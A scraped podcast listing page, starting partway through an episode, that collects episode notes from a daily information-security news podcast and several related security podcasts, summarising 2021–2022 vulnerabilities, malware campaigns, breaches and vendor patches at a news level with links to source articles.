Jupiter and JupiterX Core Plugin affect more than 90,000 sites. The vulnerability affects Jupiter Theme 6.10.1 or earlier, and JupiterX Core Plugin 2.0.7 or earlier. Updated versions have patched the flaws. From PortSwigger.net:A critical vulnerability in Flux2, the continuous delivery tool for Kubernetes, can enable rogue tenants in multi-tenancy deployments to sabotage their neighbors that are using the same off-premise infrastructure. The remote code execution flaw arises through improper validation of kubeconfig files, which “can define commands to be executed to generate on-demand authentication tokens”. In a single tenant deployment, this flaw is only a 6.8 severity. In multi tenant deployments, that rating jumps to a 9.9 And last this week, from ZDNet.comNewly registered domains that just appeared in April, mimic a legitimate Microsoft Windows 11 OS download portal. Unfortunately, what you actually get is a nasty little information stealer called Vidar. Link to the full Zscaler report in the article. That's all for me this week. Remember to LIKE and SUBSCRIBE. And as always, until next time, be safe out there.

news microsoft os windows lazarus chat delivery hackers jupiter wordpress chatbots north korean flux phishing vmware malware exploit sql kubernetes brute infosec microsoft windows powershell vidar zdnet zscaler vidor trustwave threatpost vmware horizon

Apple attack, Conti hits Parker, iPhone vuln, and more.

Play Episode Listen Later May 17, 2022 2:40

A daily look at the relevant information security news from overnight.Episode 238 - 17 May 2022Apple attack - https://www.bleepingcomputer.com/news/security/apple-emergency-update-fixes-zero-day-used-to-hack-macs-watches/Conti hits Parker - https://www.infosecurity-magazine.com/news/parker-conti-ransomware/Tesla BLE - https://www.bleepingcomputer.com/news/security/hackers-can-steal-your-tesla-model-3-y-using-new-bluetooth-attack/Card skimming - https://www.zdnet.com/article/fbi-hackers-used-malicious-php-code-to-grab-credit-card-data/iPhone vulv- https://threatpost.com/iphones-attack-turned-off/179641/Hi, I'm Paul Torgersen. It's Tuesday May 17th, 2022, and this is a look at the information security news from overnight. From BleepingComputer.com:Apple has released security updates to address a zero-day vulnerability that threat actors can exploit in attacks targeting Macs and Apple Watches. The flaw is an out-of-bounds write issue in the AppleAVD, the kernel extension for audio and video decoding. Apple says it is likely this has already been exploited in the wild. From Infosecurity-magazine.com:US manufacturer Parker-Hannifin has announced a data breach exposing employees' PII after being the target of a Conti ransomware attack. The company said that an unauthorized third party gained access to its IT systems between 11 and 14 of March this year. On the plus side, if you‘re information was involved, you just got two free years of identity theft monitoring. From BleepingComputer.com:Security researchers at the NCC Group have developed a tool to carry out a Bluetooth Low Energy relay attack that bypasses all existing protections to authenticate on target devices. What target devices, you ask? Teslas. Details in the article. From ZDNet.com:The FBI put out a warning that someone is scraping credit card data from the checkout pages of US businesses' websites. The bad actor is injecting malicious PHP Hypertext Preprocessor code into the business' online checkout page and sending the scraped data to a server that spoofed a legitimate card processing server. They also left a backdoor into the victims system. And last today, from ThreatPost.comBecause of how Apple implements standalone wireless features such as Bluetooth, Near Field Communication and Ultra-wideband technologies, researchers have found that iPhones are vulnerable to malware loading attacks even when the device is turned off. The root cause of the issue is how iPhones implement low power mode for wireless chips. No comment yet from Apple, but there is a link to the research report in the article. That's all for me today. Remember to LIKE and SUBSCRIBE. And as always, until next time, be safe out there.

apple news iphone attack security fbi tesla hits mac apple watches bluetooth ransomware macs malware conti infosec vuln pii ble skimmer ncc group parker hannifin bluetooth low energy tesle near field communication threatpost

HP broken BIOS, New Nerbian, Konica cure, and more.

Play Episode Listen Later May 12, 2022 2:41

A daily look at the relevant information security news from overnight.Episode 237 - 12 May 2022HP broken BIOS - https://www.bleepingcomputer.com/news/security/hp-fixes-bug-letting-attackers-overwrite-firmware-in-over-200-models/New Nerbian - https://threatpost.com/nerbian-rat-advanced-trick/179600/Bitter at Bangladesh - https://www.bleepingcomputer.com/news/security/bitter-cyberspies-target-south-asian-govts-with-new-malware/Fake Vanity - https://portswigger.net/daily-swig/box-zoom-google-docs-offer-phishing-boost-with-vanity-url-flawsKonica cure- https://www.securityweek.com/konica-minolta-printers-vulnerable-hacking-physical-accessHi, I'm Paul Torgersen. It's Thursday May 12th, 2022, and this is a look at the information security news from overnight. From BleepingComputer.com:HP has released BIOS updates to fix two 8.8 severity vulnerabilities that would allow code to run with Kernel privileges, and affects over 200 PC and notebook products. The problem appears to be that an SMI handler can be triggered from the OS environment. You can see the details and a couple important links in the article. From ThreatPost.com:A newly discovered and complex remote access trojan dubbed Nerbian RAT, is spreading via malicious email campaigns using COVID-19 as a lure. This multi-feature baddie, including the ability to evade analysis or detection by researchers. The majority of the attacks have been centered in Spain and the United Kingdom. From BleepingComputer.com:APT cyberespionage group Bitter has been found targeting the government of Bangladesh with a new malware with remote file execution capabilities. These messages are sent via spoofed email addresses that appear to come from Pakistani government organizations. This was likely possible by exploiting a flaw in the Zimbra mail server that allows attackers to send messages from a non-existent mail domain. Full details from the Talos research in the article. From PortSwigger.net:Threat actors are enhancing their phishing campaigns by exploiting a failure to validate subdomains within so-called ‘vanity URLs' used in SaaS applications. Apps such as Box, Zoom, and Google Docs validate vanity URLs' URI (the unique sequence of characters at the end of the link), but not its descriptive subdomain, which is the portion preceding the URI. And last today, from SecurityWeek.com:Hundreds of thousands of Konica printers are vulnerable to hacking via physical access. The vendor produced firmware and operating system patches in early 2020, but details are only being disclosed now because in many cases the patches need to be manually installed by a service technician. That was a bit tough in the midst of the Covid shutdowns. That's all for me today. Remember to LIKE and SUBSCRIBE. And as always, until next time, be safe out there.

covid-19 google news zoom united kingdom spain os pc cure threats apps hack hackers saas hundreds bitter bangladesh hp rat pakistani ransomware google docs phishing malware bios urls uri apt kernel infosec talos smi zimbra konica threatpost

Windows zero-days patched, Intel bad memory, @ phishing, and more.

Play Episode Listen Later May 11, 2022 3:33

A daily look at the relevant information security news from overnight.Episode 236 - 11 May 2022Windows zero-days patched - https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-new-ntlm-relay-zero-day-in-all-windows-versions/Intel bad memory - https://threatpost.com/intel-memory-bug-poses-risk-for-hundreds-of-products/179595/Siemens and Schneider patches - https://www.securityweek.com/ics-patch-tuesday-siemens-schneider-electric-address-43-vulnerabilitiesIceApple bites - https://www.bleepingcomputer.com/news/security/new-iceapple-exploit-toolset-deployed-on-microsoft-exchange-servers/Adobe patches - https://www.securityweek.com/adobe-warns-critical-security-flaws-enterprise-products@ phishing- https://threatpost.com/novel-phishing-trick-uses-weird-links-to-bypass-spam-filters/179587/Hi, I'm Paul Torgersen. It's Wednesday May 11th, 2022, and this is a look at the information security news from overnight. From BleepingComputer.com:Microsoft has patched 75 flaws on Mays' Patch Tuesday including an actively exploited Windows LSA spoofing zero-day that attackers can exploit remotely to force domain controllers to authenticate them via the Windows NT LAN Manager. This particular bug affects all Windows versions from Windows 7 and Windows Server 2008 through Windows 11 and Windows 2022. Two other zero-days were also addressed in the update. From ThreatPost.com:Intel is reporting a memory bug impacting microprocessor firmware used in hundreds of products. The vulnerability resides inside some of the Intel Optane SSD and Intel Optane Data Center products, which allows privilege escalation, denial of service, or information disclosure. Details in the article. From SecurityWeek.com:Schneider Electric has released three advisories to inform customers about eight vulnerabilities, and Siemens has released 12 advisories covering 35 vulnerabilities, including one with a critical severity rating. Details and links to the advisory statements in the article. From BleepingComputer.com:CrowdStrike researchers have found a new post-exploitation framework that they dubbed IceApple, deployed mainly on Microsoft Exchange servers across a wide geography. This stealthy little framework is .NET-based and comes with at least 18 modules, each for a specific task, that help the attacker discover relevant machines on the network, steal credentials, delete files and directories, or exfiltrate data. Details and a link to download the CrowdStrike report in the article. From SecurityWeek.com:Adobe used this Patch Tuesday to cover at least 18 serious security defects in multiple enterprise-facing products and warned that unpatched systems are at risk of remote code execution attacks. Link to the advisory in the article, and in what has become a bit of a theme today, get your patch on kids. And last today, from ThreatPost.com:Researchers have identified a never-before-seen method for sneaking malicious links into phishing emails. The trick takes advantage of a key difference in how email inboxes and browsers read URLs. Specifically, using an “@” symbol in the middle of the string. Most browsers will either interpret this as authentication information, or simply ignore it and execute whatever follows the symbol. Read about all the dirty tricks in the article. That's all for me today. Remember to LIKE and SUBSCRIBE. And as always, until next time, be safe out there.

Thumbs suck, New NetDooka, And. And. It's gone, and more.

Play Episode Listen Later May 6, 2022 3:08

A daily look at the relevant information security news from overnight.Episode 234 - 06 May 2022Thumbs suck - https://threatpost.com/usb-malware-targets-windows-installer/179521/New NetDooka - https://www.bleepingcomputer.com/news/security/new-netdooka-malware-spreads-via-poisoned-search-results/CT swipe - https://portswigger.net/daily-swig/wordpress-sites-getting-hacked-within-seconds-of-tls-certificates-being-issuedAndroid updates - https://www.bleepingcomputer.com/news/security/google-fixes-actively-exploited-android-kernel-vulnerability/And. And. It's gone- https://www.zdnet.com/article/weird-bug-made-google-docs-crash-if-you-typed-one-word-five-times/Hi, I'm Paul Torgersen. It's Friday May 6th, 2022, and this is a look at the information security news from overnight. From ThreatPost.com:A new wormable malware called Raspberry Robin has been active since this past September and is delivered onto Windows machines through USB drives. Do people still do that? Remember when you used to go to a conference, and vendors would hand out thumb drives? Then people would go home and actually stick them into their computer? Don't do that. There is more information in the article, but the answer is: don't do that. From BleepingComputer.com:A new malware framework known as NetDooka has been discovered being distributed through the PrivateLoader pay-per-install malware distribution service. The framework features a loader, a dropper, a protection driver, and a powerful RAT component that relies on a custom network communication protocol. Researchers at TrendMicro warn that, while the tool is still in an early development phase, it is already very capable. Link to the research in the article. From PortSwigger.com:Attackers are abusing the Certificate Transparency system to compromise new WordPress sites in the brief window after web admins upload the WordPress files, but before they manage to secure the website with a password. Hackers are evidently monitoring the CT logs because sites are being hacked within minutes, sometimes seconds, of TLS certificates being requested. You know where to find the details. From BleepingComputer.com:Google has released the second part of their May security patch for Android, including a fix for an actively exploited Linux kernel vulnerability. Do note that if you are using Android 9 or older, this patch does not apply to you and you really should upgrade to a more recent Android OS. Also, if you have a Google Pixel, you have some additional patching to do. Get your patch on kids. And last today, from ZDNet.com:An obscure bug is making Google Docs crash after users typed in a simple, repeated word pattern. If you type the word and, with a capital A, and a period and space after it, five times in a row, it would crash your doc. And any attempts to reopen the doc would retrigger the crash. And “and” isn't the only word that triggers this, but not ALL words trigger it. It appears that Google has now fixed the bug, but, but, but but, but beware. That's all for me today. Remember to LIKE and SUBSCRIBE. And as always, until next time, be safe out there.

google news android threats suck windows researchers hackers wordpress rat usb pixel linux ransomware google docs malware phish attackers thumbs google pixel infosec tls zero day trend micro zdnet android os threatpost raspberry robin

The State of Secrets Sprawl

Play Episode Listen Later May 6, 2022 16:50

Can I tell you a secret? Will you keep it between us? You've probably said this or heard this when it comes to friends and family. However, do you also know that secret keeping, or lack thereof is one of the biggest issues that businesses face? According to the recent The State of the Secret Sprawl from GitGuardian further defines the breadth of business secrets. “A secret can be any sensitive data that we want to keep private. When discussing secrets in the context of software development, secrets generally refer to digital authentication credentials that grant access to services, systems and data. These are most commonly API keys, usernames and passwords, or security certificates. Secrets are what tie together different building blocks of a single application by creating a secure connection between each component. Secrets grant access to the most sensitive systems.” In this podcast with Mackenzie Jackson, developer advocate at GitGuardian, we dive into the report and also the issues that corporations face with public leaks from groups like Lapsus and more, along with as ways that developers can keep their code safe. For the full report, click here.

state secrets api infosec lapsus sprawl threatpost gitguardian

Cyberpunk Ape caper, Windows log trojan, NHS phish, and more.

Play Episode Listen Later May 5, 2022 3:14

A daily look at the relevant information security news from overnight.Episode 233 - 055 May 2022Cyberpunk Ape caper - https://www.bleepingcomputer.com/news/security/pixiv-deviantart-artists-hit-by-nft-job-offers-pushing-malware/Windows log trojan - https://www.securityweek.com/kaspersky-warns-fileless-malware-hidden-windows-event-logsF5 RCE bug - https://threatpost.com/f5-critical-bugbig-ip-systems/179514/More Cisco bugs - https://www.zdnet.com/article/vm-escape-and-root-access-bugs-fixed-in-cisco-nfv-infrastructure-software/NHS phish- https://www.bleepingcomputer.com/news/security/attackers-hijack-uk-nhs-email-accounts-to-steal-microsoft-logins/

news nfts threats windows hack cyberpunk nhs ransomware trojan malware phish caper infosec f5 kaspersky deviantart zero day zdnet pixiv threatpost

Exchange exfil, uClibc needs uHelp, Moshen Dragon rears up, and more.

Play Episode Listen Later May 3, 2022 2:37

A daily look at the relevant information security news from overnight.Episode 231 - 03 May 2022Exchange exfil - https://www.bleepingcomputer.com/news/security/cyberspies-use-ip-cameras-to-deploy-backdoors-steal-exchange-emails/uClibc needs uHelp - https://www.securityweek.com/many-iot-devices-exposed-attacks-due-unpatched-flaw-uclibc-librarySTMP sidestep - https://www.bleepingcomputer.com/news/security/google-smtp-relay-service-abused-for-sending-phishing-emails/Kellogg Community Closed - https://www.battlecreekenquirer.com/story/news/2022/05/02/ransomware-attack-forces-kcc-cancel-classes-indefinitely/9612941002/Moshen Dragon rears up- https://www.bleepingcomputer.com/news/security/chinese-cyber-espionage-group-moshen-dragon-targets-asian-telcos/

google news microsoft dragon threats hackers exchange kellogg ransomware malware apt infosec mandiant smtp kcc threatpost

REvil revived, Synology warning, Three Frogs, and more.

Play Episode Listen Later Apr 29, 2022 2:56

A daily look at the relevant information security news from overnight.Episode 229 - 29 April 2022REvil revived - https://www.techtarget.com/searchsecurity/news/252516434/REvil-ransomware-attacks-resume-but-operators-are-unknownSynology warning - https://www.bleepingcomputer.com/news/security/synology-warns-of-critical-netatalk-bugs-in-multiple-products/Phishing RedLine - https://www.zdnet.com/article/this-phishing-campaign-delivers-malware-that-steals-your-passwords-and-chat-logs/Dos Ukraine - https://www.bleepingcomputer.com/news/security/ukraine-targeted-by-ddos-attacks-from-compromised-wordpress-sites/Three Frogs- https://threatpost.com/apt-id-3-separate-actors/179435/

news threats frogs hackers wordpress ransomware malware redline revived apt infosec botnets stealer ttp revil zdnet synology techtarget apt10 threatpost

Bumblebee sting, Russian attacks, Black Basta rises, and more.

Play Episode Listen Later Apr 28, 2022 2:29

A daily look at the relevant information security news from overnight.Episode 228 - 28 April 2022Bumblebee sting - https://www.bleepingcomputer.com/news/security/new-bumblebee-malware-takes-over-bazarloaders-ransomware-delivery/Russian attacks - https://www.zdnet.com/article/microsoft-russia-has-launched-hundreds-of-cyberattacks-against-ukraine/QNAP snap - https://www.bleepingcomputer.com/news/security/qnap-warns-users-to-disable-afp-until-it-fixes-critical-bugs/GitHUb flub - https://threatpost.com/github-repos-stolen-oauth-tokens/179427/Journalists phished -https://threatpost.com/hackers-target-journalists-goldbackdoor/179389/Black Basta rises- https://www.bleepingcomputer.com/news/security/new-black-basta-ransomware-springs-into-action-with-a-dozen-breaches/

Killing Cloud Risk by Bulletproofing App Security: Podcast

Play Episode Listen Later Feb 16, 2022 25:08

Applications are the most preferred vectors for cybercriminals. Yet no single team or process can assure the rollout of safe cloud applications. From code design to unit testing to deployment, teams and tools have to work together to detect risks early while keeping the pipeline of digital products moving. Alex Rice, CTO at HackerOne and Johnathan Hunt, VP of Security at GitLab, help development teams evolve their processes to build security directly into their workflows for smooth and safe cloud app rollouts. They dropped by the Threatpost podcast recently to share tips on DevSecOps, including: How to build a continual testing, monitoring, and feedback processes to drive down application risk. Developing a continuous approach to application security and DevOps security tools. Why collaboration and continual feedback is essential across development, cloud and security teams. …as well as how to deal with the boatload of animosity between development and security teams. One tip: Assume positive intent!

risk developing security killing cloud cto applications assume devops gitlab devsecops hackerone security podcast bulletproofing alex rice threatpost

How to Buy Precious Patching Time as Log4j Exploits Fly

Play Episode Listen Later Dec 14, 2021 19:56

Threatpost podcast: Cybereason CTO Yonatan Striem-Amit shares details about the company's vaccine: a fast shot in the arm released within hours of the Apache Log4j zero-day horror show having been disclosed.

precious exploits patching apache log4j threatpost

Entering the Cybersecurity Field with Dr. Michael Hart (Season Finale)

Play Episode Listen Later Dec 8, 2021 35:57

Looking to break into the field of cybersecurity? Special guest Dr. Michael Hart, Assistant Professor of Computer Information Science at Minnesota State University, Mankato, gives his best advice! Nathan sits down with Dr. Hart to chat about the job market, skills needed for the field, recommended coursework, degrees, and certifications, and a plethora of other resources to get started. Plan your path to landing your dream cybersecurity career! This episode concludes with news stories including a data breach at electronics company Panasonic and a cyberattack on Ohio-based DNA Diagnostics Center. ________________ News Sources: Story 1: Seals, Tara. "Panasonic's Data Breach Leaves Open Questions." Threatpost, 30 November 2021, https://threatpost.com/panasonic-data-breach-questions/176660/ Story 2: Toulas, Bill. "DNA Testing Firm Discloses Data Breach Affecting 2.1 Million People." Bleeping Computer, 30 November 2021, https://www.bleepingcomputer.com/news/security/dna-testing-firm-discloses-data-breach-affecting-21-million-people/

story ohio plan field season finale entering assistant professor cybersecurity hart seals panasonic information security million people infosec mankato minnesota state university michael hart bleeping computer threatpost cyberaware

The Wild World of Cybercrime

Play Episode Listen Later Dec 1, 2021 13:28

The internet took the world by storm, and with it came a variety of cybercrimes that you should know about. From identity theft to cyber stalking, Ham and Nathan run through some of the most common cybercrimes that affect millions of people a year. Learn top risks to look out for in order to avoid falling victim to criminals. This episode concludes with news from expert Mercy, including a recent cyberattack on wind turbine manufacturer Vestas Wind Systems, a confirmed data breach on internet domain registrar GoDaddy, and an up and coming TSA PreCheck membership scam. _______________ News Sources: Story 1: Toulas, Bill. "Wind Turbine Giant Vestas' Data Compromised in Cyberattack." Bleeping Computer, 22 November 2021, https://www.bleepingcomputer.com/news/security/wind-turbine-giant-vestas-data-compromised-in-cyberattack/ Story 2: Seals, Tara. "GoDaddy's Latest Breach Affects 1.2M Customers." Threatpost, 22 November 2021, https://threatpost.com/godaddys-latest-breach-customers/176530/ Story 3: Toulas, Bill. "Fake TSA PreCheck Sites Scam US Travelers with Fake Renewals." Bleeping Computer, 19 November 2021, https://www.bleepingcomputer.com/news/security/fake-tsa-precheck-sites-scam-us-travelers-with-fake-renewals/

story cybersecurity ham seals cyberattacks cybercrime godaddy information security wild world infosec tsa precheck bleeping computer threatpost cyberaware

What is Cryptocurrency?

Play Episode Listen Later Nov 24, 2021 12:27

Whether you're an aspiring crypto enthusiast, a skeptic, or just plain curious – learn the basics of what cryptocurrency is and some of the potential risks. Find out what crypto coins really are, some interesting examples, and how they're used. From Bitcoin to Dogecoin, Nathan and Ham walk you through this intriguing world with basic facts and personal anecdotes. Plus, find out top risks you should watch out for, including scams, cryptojacking, and mining. This episode concludes with news from expert Mercy, including a TikTok scam targeting influencers, an update on the Robinhood data breach, and hundreds of WordPress sites hacked for a cryptocurrency ransom. _______________ News Sources: Story 1: Montalbano, Elizabeth. "Phishing Scam Aims to Hijack TikTok 'Influencer' Accounts." Threatpost, 17 November 2021, https://threatpost.com/phishing-scam-tiktok-influencer/176391/ Story 2: Abrams, Lawrence. "7 Million Robinhood User Email Addresses for Sale on Hacker Forum." Bleeping Computer, 15 November 2021, https://www.bleepingcomputer.com/news/security/7-million-robinhood-user-email-addresses-for-sale-on-hacker-forum/ Story 3: Toulas, Bill. "WordPress Sites Are Being Hacked in Fake Ransomware Attacks." Bleeping Computer, 16 November 2021, https://www.bleepingcomputer.com/news/security/wordpress-sites-are-being-hacked-in-fake-ransomware-attacks/

tiktok story bitcoin sale cybersecurity cryptocurrency robin hood wordpress accounts abrams ham dogecoin information security infosec montalbano bleeping computer threatpost cyberaware

The Future of Cybersecurity with Jeff Hall

Play Episode Listen Later Nov 17, 2021 39:48

Rewind to see how the past has influenced the present and fast forward to see what the future could bring with special guest expert Jeff Hall of Truvantis, a cybersecurity company. Nathan sits down with Jeff to chat about his experiences in the changing field of cybersecurity, including changes in the internet, the job landscape, and college degrees since he entered. The two also discuss the reality of cyberwarfare and new trends for the future including innovation in artificial intelligence and machine learning. This episode concludes with news stories from expert Mercy, including a cyberattack on trading company Robinhood, a phishing attack targeting Microsoft 365 and Google users, and the exciting new availability of Mozilla Firefox in the Microsoft Windows Store. ________________ News Sources: Story 1: Abrams, Lawrence. "Robinhood Discloses Data Breach Impacting 7 Million Customers." Bleeping Computer, 8 November 2021, https://www.bleepingcomputer.com/news/security/robinhood-discloses-data-breach-impacting-7-million-customers/ "Robinhood Announces Data Security Incident (Update)." Robinhood, 16 November 2021, https://blog.robinhood.com/news/2021/11/8/data-security-incident Story 2: Iyer, Abhishek. "A Pointed Spoof: Proofpoint Credential Phishing." Armorblox, 4 November 2021, https://www.armorblox.com/blog/proofpoint-credential-phishing/ Seals, Tara. "Proofpoint Phish Harvests Microsoft O365, Google Logins." Threatpost, 5 November 2021, https://threatpost.com/proofpoint-phish-microsoft-o365-google-logins/176038/ Story 3: Warren, Tom. "Mozilla's Firefox Browser Arrives in the Windows Store." The Verge, 9 November 2021, https://www.theverge.com/2021/11/9/22771845/mozilla-firefox-microsoft-store-windows-download

google story microsoft cybersecurity robin hood abrams verge seals rewind mozilla information security infosec iyer abhishek mozilla firefox windows store jeff hall million customers bleeping computer threatpost armorblox cyberaware

The Scoop on Ransomware

Play Episode Listen Later Oct 13, 2021 24:54

Tune in to find out what exactly ransomware is, who these attackers are, and why and how they do it. Nathan and Ham discuss recent large attacks by groups such as REvil and WannaCry. Hear about the far-reaching effects these attacks can have and how people and businesses can protect themselves. The episode concludes with a chat about cybersecurity tactics such as cyber insurance and ransomware negotiators. Both are ways that businesses can protect themselves in the event of a ransomware attack. Lastly, hear the latest news on ransomware attacks and more from Mercy. News Sources: Story 1: Vaas, Lisa. "Crystal Valley Farm Coop Hit with Ransomware." ThreatPost, 22 September 2021, https://threatpost.com/crystal-valley-farm-coop-hit-with-ransomware/174928/ Story 2: Gatlan, Sergiu. "Transnational Fraud Ring Stole Millions from Army Members, Veterans." Bleeping Computer, 3 October 2021, https://www.bleepingcomputer.com/news/security/transnational-fraud-ring-stole-millions-from-army-members-veterans/ Story 3: Quach, Katyanna. "Google to Auto-Enroll 150m Users, 2m YouTubers with Two-Factor Authentication." The Register, 6 October 2021, https://www.theregister.com/2021/10/06/google_twofactor_authentication/

google story veterans register cybersecurity users scoop ham ransomware information security infosec wannacry revil two factor authentication sergiu vaas bleeping computer threatpost cyberaware

Basics of Cybersecurity

Play Episode Listen Later Oct 6, 2021 25:30

Tune in to hear Nathan and Ham discuss how to #BeCyberAware with the basics of cybersecurity. Learn about the Four P's – phishing, passwords, patching, and protect your devices – to help you stay safe. Plus, Nathan and Ham both share interesting personal stories about their encounters with cybercrime and they give their top tips on how to avoid falling into the traps of hackers. Get an insight into cybersecurity terminology you may have never even heard of, like a “whaling” and “zero-day vulnerability.”This episode is ended with a segment of current news and events given by Mercy. She covers updates including new malware that hunts gaming accounts, an information leak from a far-right militia, and two more dangerous malware targeting Android and Mac devices._______News Sources:Story 1:Bracken, Becky. “Gamers Beware: Malware Hunts Steam, Epic and EA Origin Accounts.” ThreatPost, 28 September 2021, https://threatpost.com/gamers-malware-steam-epic-ea-origin-accounts/175081/Story 2:Thomson, Iain. “Emails, chat logs, more leaked online from far-right militia linked to US Capitol riot.” The Register, 28 September 2021, https://www.theregister.com/2021/09/28/in_brief_security/Story 3:Seals, Tara. “TangleBot Malware Reaches Deep into Android Device Functions.” ThreatPost, 24 September 2021, https://threatpost.com/tanglebot-malware-device-functions/174999/

story epic basics android mac register cybersecurity emails ham seals us capitol iain thomson information security infosec bracken four p threatpost cyberaware

Making Memorable Interview Impressions with Reporters & Analysts

WitzEnd

Play Episode Listen Later Oct 4, 2021 14:45

Do you ever wonder how to keep reporters interested and engaged during a briefing? On today's episode of ConnectThe2, co-hosts Millie and Rich speak with editors, analysts, and journalists about the importance of capturing and holding a reporters' attention during an interview. Connect2's approach… At Connect2 Communications, Millie and Rich encourage their clients to be the best storytellers they can be and to put these storytelling skills to use when interviewing with reporters. Throughout the years, Millie and Rich have asked their fair share of reporters, “What makes an interview stand out to you?” and on today's episode, they reveal their favorite answers. Stick around for an inside scoop on how to pique a reporter's interest. Clint Boulton's take on the importance of narrative... Clint Boulton, Senior Writer at CIO.com, explains how a narrative can make or break an interview. If the interviewee (i.e. CIO, CTO, etc.) tells a compelling narrative in an interview or briefing, it will immediately capture an editor's attention. Tara Seals dives into her biggest pet peeves… Tara Seals, Editor at Threatpost, describes her annoyance with vendor specific messaging. Tara uses the example of tech companies that are often so “hellbent” on selling their product, they completely ignore the actual story that reporters and editors are interested in writing. Eric Savitz speaks on compelling stories... Eric Savitz, Editor for Barrons, illustrates what a compelling story can do to spark a reporter's interest. Eric explains how most interviews are repetitive and lack a key message. He reveals that the best way to leave an impression in an interview is to add an engaging storytelling element. Julie Kunstler raves about two-way conversations… Julie Kunstler, Analyst with Omdia, reveals her main frustration with briefings: ignoring the analyst. Julie explains how important it is to converse with the analyst you are briefing. Both parties can benefit from getting a well-rounded view of the issue or story at hand. Dean Takahashi shares a memorable interview… Dean Takahashi, journalist for Venturebeat, shares a memorable interview with his old professor about the ethics of video games. Dean explains that an interview where there is back and forth between both parties keeps the journalist interested and creates a story the writer is excited to tell. Quotes • “Part of marketing and publicizing your company's products and ultimately receiving earned media coverage, involves conducting interviews or briefings with reporters.” (0:18-0:28 | Millie) • “And this goes all the way back to anthropology. We, as humans, relate to stories more than anything else in terms of a communication perspective.” (02:29-02:40 | Clint Boulton) • “My biggest pet peeve is when people insist on being vendor-specific when you are actually trying to talk to them about general trends and you just want general insight to things.” (04:18-04:27 | Tara Seals) • “You are just looking for some element to latch on to that gets through the clutter.” (07:12-07:17 | Eric Savitz) • “Rather than focusing on the technology, I try to understand how they are defining the problem.” (08:50-08:55 | Julie Kunstler) • “The reason why I wish they would ask me what I think or how I look at it is I think they could get more out of the briefing and the conversation. It becomes more interactive, which leads to deeper involvement.” (09:52- 10:07 | Julie Kunstler) Learn more about Connect2 Communications: Website: https://www.connect2comm.com/ Podcast home page: https://www.connect2comm.com/podcast Twitter handle: @Connect2_Comm Instagram handle: @connect2_comm LinkedIn: https://www.linkedin.com/company/connect2-communications Facebook: https://www.facebook.com/Connect2-Communications

rich cto analysts impressions cio memorable reporters senior writer venturebeat barrons quotes part omdia dean takahashi threatpost

DDoS Attacks Are a Flourishing Business for Cybercrooks – Podcast

Play Episode Listen Later Sep 14, 2021 24:09

Imperva's Peter Klimek visited Threatpost podcast to discuss the evolution of DDoS attacks: They started out as inconveniences but evolved to the point where attackers can disrupt businesses for as little as the price of a cup of coffee,

attacks ddos imperva flourishing business threatpost

What Ragnar Locker Got Wrong About Ransomware Negotiators – Podcast

Transatlantic Cable Podcast

Play Episode Listen Later Sep 8, 2021 13:00

Bryce Webster-Jacobsen – director of intelligence operations at digital risk protection/ransomware negotiators GroupSense – dropped by the Threatpost podcast to tell us what percentage of Ragnar Locker's warning that victims shouldn't call the FBI/police/negotiators is a bluff and what, if anything, security teams should take seriously.

fbi ransomware locker negotiators ragnar ragnar locker groupsense threatpost

The Transatlantic Cable - Episode 216

Play Episode Listen Later Aug 25, 2021 36:43

This week on the Kaspersky Transatlantic Cable podcast, Ahmed, Dave, and I discuss a number of topics that really run the gamut — from spy ships to the robot apocalypse, Bitcoin, and more. Kicking things off is a story from Tom Spring on Threatpost about how Microsoft Power App configurations have led to the leak of more than 38 million sensitive records. We also debate why private is not the default option and actually invites user error. From there, we jump into some cell-phone-battery myth-busting. (For the record, we all get angry at one time or another.) Then, a Russian spy ship is hovering around the transatlantic cables. Comrades, we are flattered, but you can download the podcast on your favorite platforms, no need to launch a ship — it is 2021, after all. Following that tongue-in-cheek story, we head to the UK for a look at PayPal and its new embrace of cryptocurrencies. To close things out, we discuss the new robots Elon Musk and Tesla are pondering.

uk russian elon musk bitcoin tesla kicking paypal cable transatlantic comrades kaspersky threatpost

What's Next for T-Mobile and Its Customers? – Podcast

Ping - A Firewalls.com Podcast

Play Episode Listen Later Aug 19, 2021 16:45

Interos CEO Jennifer Bisceglie drops by the Threatpost podcast to talk about avoiding the mess a T-Mobile size breach can lead to, with the damage it can do to a business's brand, reputation, customer loyalty and revenue stream.

mobile customers t mobile threatpost

Chaos and Friends: The One With Malware

Play Episode Listen Later Aug 18, 2021 32:12

While ransomware has taken center stage for several months now, bad actors aren't resting on their laurels with existing tools. Threatpost Senior Editor Tara Seals joins us to discuss a newly discovered malware, dubbed Chaos. We talk about what it resembles, what it may do, and why you should be worried. Plus, Tara tells us why the Friends reunion special led to a spike in online fraud.Read more about Chaos: https://threatpost.com/chaos-malware-ransomware-wiper/168520/. In headlines, we discuss a guilty plea for SIM swapping, a data breach affecting T-Mobile, and some troubling password numbers. Here are the stories: Hacker Pleads Guilty to SIM Swapping Attacks, Cryptocurrency Thefthttps://www.securityweek.com/hacker-pleads-guilty-sim-swapping-attacks-cryptocurrency-theftT-Mobile investigating claims of customer data breachhttps://www.reuters.com/business/media-telecom/t-mobile-investigating-claims-customer-data-breach-vice-2021-08-15/Most employees reusing personal passwords to protect corporate datahttps://www.helpnetsecurity.com/2021/08/16/employees-reusing-personal-passwords/?web_view=trueGet info on all things network security through our blog, https://firewalls.com/blog.And please do reach out, as we want to hear from you. Suggest an episode topic, ask a question, or just say hi in a review, or by emailing podcast@firewalls.com. New episodes are normally released every other Wednesday, so subscribe/follow to ensure you get the latest first - and again, please rate and review.Thanks for listening!

friends interview news chaos hbo cybersecurity sim passwords ransomware t mobile ping malware data breach tech news online fraud friends the one threatpost

We COVID-Clicked on Garbage, Report Finds: Podcast

@BEERISAC: CPS/ICS Security Podcast Playlist

Play Episode Listen Later Aug 4, 2021 16:20

n the company's annual Human Factor 2021 report assessing how the threat landscape morphed over the past year, Proofpoint researchers scratched their heads over the reasons for so many users succumbing to malicious email attachments. Could be that threat actors jumped on our Pavlovian work-from-home security conditioning, as suggested by Proofpoint vice president and general manager of email fraud defense Rob Holmes. Check out the Threatpost podcast for his take on how the pandemic influenced the threat landscape.

covid-19 garbage human factors clicked pavlovian proofpoint rob holmes threatpost

IoT Piranhas Are Swarming Industrial Controls

Play Episode Listen Later Jul 25, 2021 23:24

